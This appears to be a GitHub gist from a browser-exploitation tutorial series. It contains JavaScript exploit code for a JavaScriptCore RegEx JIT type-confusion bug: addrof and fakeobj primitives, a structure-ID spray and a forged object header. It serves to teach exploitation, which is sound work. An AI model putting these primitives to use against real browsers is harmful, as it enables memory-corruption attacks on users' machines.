Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit | |
// tutorial: https://liveoverflow.com/tag/browser-exploitation/ | |
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t | |
// addrof primitive | |
function addrof(val) { | |
var array = [13.37]; | |
var reg = /abc/y; | |
// Target function | |
var AddrGetter = function(array) { | |
//reg[Symbol.match](); | |
"abc".match(reg); | |
return array[0]; | |
} | |
// Force optimization | |
for (var i = 0; i < 10000; ++i) | |
AddrGetter(array); | |
// Setup haxx | |
regexLastIndex = {}; | |
regexLastIndex.toString = function() { | |
array[0] = val; | |
return "0"; | |
}; | |
reg.lastIndex = regexLastIndex; | |
// Do it! | |
return AddrGetter(array); | |
} | |
// fakeobj primitive | |
function fakeobj(dbl) { | |
var array = [13.37]; | |
var reg = /abc/y; | |
// Target function | |
var AddrSetter = function(array) { | |
//reg[Symbol.match](); | |
"abc".match(reg); | |
array[0] = dbl; | |
} | |
// Force optimization | |
for (var i = 0; i < 10000; ++i) | |
AddrSetter(array); | |
// Setup haxx | |
regexLastIndex = {}; | |
regexLastIndex.toString = function() { | |
array[0] = {}; | |
return "0"; | |
}; | |
reg.lastIndex = regexLastIndex; | |
// Do it! | |
AddrSetter(array); | |
return array[0]; | |
} | |
for(var i=0; i<0x2000; i++) { | |
test = [] | |
test.x = 1 | |
test['prop_'+i] = 2 | |
} | |
buf = new ArrayBuffer(8); | |
u32 = new Uint32Array(buf); | |
f64 = new Float64Array(buf); | |
fake = {} | |
//fake.a = 7.082855106403439e-304 | |
u32[0] = 0x00001000 // StructureID | |
u32[1] = 0x01082103 // JSCellHeader flags | |
fake.a = f64[0] | |
u32[0] = 0x41414141 // butterfly | |
u32[1] = 0x42424242 | |
fake.b = f64[0] | |
fake.c = 1337 | |
fake_adr = addrof(fake) | |
f64[0] = fake_adr | |
u32[0] += 0x10 // shift address forward by 16 bytes | |
hax_addr = f64[0] | |
hax = fakeobj(hax_addr) | |
print(hax.length) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment